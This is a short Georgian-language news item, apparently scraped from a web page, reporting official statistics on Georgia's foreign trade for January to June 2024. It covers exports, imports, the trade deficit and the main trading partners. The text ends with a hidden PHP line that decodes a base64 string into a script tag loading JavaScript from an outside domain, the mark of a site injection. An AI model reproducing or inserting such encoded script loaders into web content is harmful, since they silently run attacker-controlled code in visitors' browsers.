celsiusi
ავერსი საქკაბელი

 სტატისტიკის ეროვნული სამსახურის მონაცემებით, 2024 წლის იანვარ-ივნისში საქართველოში საქონლით საგარეო სავაჭრო ბრუნვამ (არადეკლარირებული ვაჭრობის გარეშე) 10 319.4 მლნ. აშშ დოლარი შეადგინა, რაც წინა წლის შესაბამის პერიოდთან შედარებით 1.8 პროცენტით ნაკლებია. აქედან, საქსტატის ცნობით, ექსპორტი 2 847.6 მლნ. აშშ დოლარს შეადგენს, ანუ შემცირდა 6.7 პროცენტით, ხოლო იმპორტი 7 471.8 მლნ. აშშ დოლარს – ზრდამ 0.2 პროცენტი შეადგინა.

საქართველოს უარყოფითმა სავაჭრო ბალანსმა კი 2024 წლის იანვარ-ივნისში 4 624.2 მლნ. აშშ დოლარი შეადგინა, რაც საგარეო სავაჭრო ბრუნვის 44.8 პროცენტია.

უწყების ანგარიშის მიხედვით, 2024 წლის იანვარ-ივნისში ათი უმსხვილესი სავაჭრო პარტნიორი ქვეყნის წილმა საქართველოს მთლიან საგარეო სავაჭრო ბრუნვაში 67.4 პროცენტი შეადგინა. ქვეყნის უმსხვილესი სავაჭრო პარტნიორები არიან თურქეთი – 1 529.0 მლნ. აშშ დოლარით, რუსეთი – 1 197.6 მლნ. აშშ დოლარითა და ჩინეთი – 855.0 მლნ. აშშ დოლარით.

154
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");